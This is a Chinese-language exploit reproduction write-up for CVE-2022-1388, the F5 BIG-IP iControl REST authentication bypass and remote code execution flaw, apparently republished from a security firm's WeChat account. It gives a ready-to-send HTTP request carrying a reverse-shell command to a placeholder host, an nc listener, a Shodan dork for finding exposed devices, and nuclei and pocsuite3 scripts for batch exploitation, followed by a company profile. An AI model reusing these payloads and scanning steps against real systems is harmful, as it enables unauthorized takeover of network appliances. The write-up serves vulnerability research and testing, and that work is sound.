0x01 漏洞描述
F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。
0x02 漏洞复现
漏洞影响:
BIG-IP 16.x: 16.1.0 - 16.1.2
BIG-IP 15.x: 15.1.0 - 15.1.5
BIG-IP 14.x: 14.1.0 - 14.1.4
BIG-IP 13.x: 13.1.0 - 13.1.4
BIG-IP 12.x: 12.1.0 - 12.1.6
BIG-IP 11.x: 11.6.1 - 11.6.5
shodan:http.title:"BIG-IP®-+Redirect" +"Server"
1.执行反弹shell命令
POST /mgmt/tm/util/bash HTTP/1.1Host: x.x.x.xContent-Length: 85Connection: Keep-Alive, X-F5-Auth-TokenCache-Control: max-age=0aX-F5-Auth-Token: aAuthorization: Basic YWRtaW46xxxxx={"command":"run","utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}
3. nc监听得到shell
nc -lnvp 7777
4.使用nuclei批量验证1.txt文件中的url是否存在该漏洞,显示存在漏洞。(nuclei稳定快,编写poc简单,有社区维护,推荐使用)
nuclei下载地址:https://github.com/projectdiscovery/nuclei
批量验证命令:nuclei -list 1.txt -t CVE-2022-1388.yamlyaml POC:id: CVE-2022-1388info:name: F5 BIG-IP iControl REST Auth Bypass RCEauthor: dwisiswant0severity: criticaldescription: |This vulnerability may allow an unauthenticated attackerwith network access to the BIG-IP system through the managementport and/or self IP addresses to execute arbitrary system commands,create or delete files, or disable services. There is no data planeexposure; this is a control plane issue only.reference:- https://twitter.com/GossiTheDog/status/1523566937414193153classification:cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hcvss-score: 9.80cve-id: CVE-2022-1388cwe-id: CWE-306tags: cvevariables:auth: "admin:"requests:- raw:- |POST /mgmt/tm/util/bash HTTP/1.1Host: {{Hostname}}Connection: keep-alive, X-F5-Auth-TokenX-F5-Auth-Token: aAuthorization: Basic {{base64(auth)}}Content-Type: application/json{"command": "run","utilCmdArgs": "-c 'echo ryaqkj'"}matchers:- type: wordwords:- "commandResult"- "ryaqkj"condition: and
5.使用pocsuite3批量验证1.txt文件中的url是否存在该漏洞,显示一个成功一个失败。
pocsuite3下载地址:https://github.com/knownsec/pocsuite3或公众号回复poc3即可下载
使用方法:python3 cli.py -r pocs/CVE-2022-1388.py -f 1.txtpoc:# -*- coding:utf-8 -*-from pocsuite3.api import Output, POCBase, register_poc, requests, loggerfrom pocsuite3.api import get_listener_ip, get_listener_portfrom pocsuite3.api import REVERSE_PAYLOADfrom urllib.parse import urljoinfrom pocsuite3.lib.utils import random_strclass DemoPOC(POCBase):vulID = "CVE-2022-1388"version ='F5 BIG-IP 16.x: 16.1.0 - 16.1.2'author = ["ry"]vulDate = "2022-05-18"createDate = "2022-05-18"updateDate = "2022-05-18"references =["https://support.f5.com/csp/article/K23605346"]name ="F5 BIG-IP RCE"appPowerLink = ''appName = 'F5 BIG-IP'appVersion = '''BIG-IP 16.x: 16.1.0 - 16.1.2BIG-IP 15.x: 15.1.0 - 15.1.5BIG-IP 14.x: 14.1.0 - 14.1.4BIG-IP 13.x: 13.1.0 - 13.1.4BIG-IP 12.x: 12.1.0 - 12.1.6BIG-IP 11.x: 11.6.1 - 11.6.5'''vulType = 'RCE'desc = '''F5 BIG-IP RCE'''samples = []install_requires = ['']def _verify(self):result = {}path = "/mgmt/tm/util/bash"url = urljoin(self.url,path)payload = "{"command":"run","utilCmdArgs":"-c 'echo ryaqjk'"}"headers = {'Content-Length': '54','Connection': 'Keep-Alive, X-F5-Auth-Token','Cache-Control': 'max-age=0a','X-F5-Auth-Token': 'a','Authorization': 'Basic YWRtaW46'}rr = requests.post(url=url,headers=headers,data=payload)try:if "ryaqjk" and "commandResult" in rr.text:result['VerifyInfo'] = {}result['VerifyInfo']['URL'] = urlresult['VerifyInfo']['Name'] = payloadexcept Exception as e:passreturn self.parse_output(result)def parse_output(self, result):output = Output(self)if result:output.success(result)else:output.fail('target is not vulnerable')return outputdef _attack(self):return self._verify()register_poc(DemoPOC)
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2022-1388 F5 BIG-IP RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论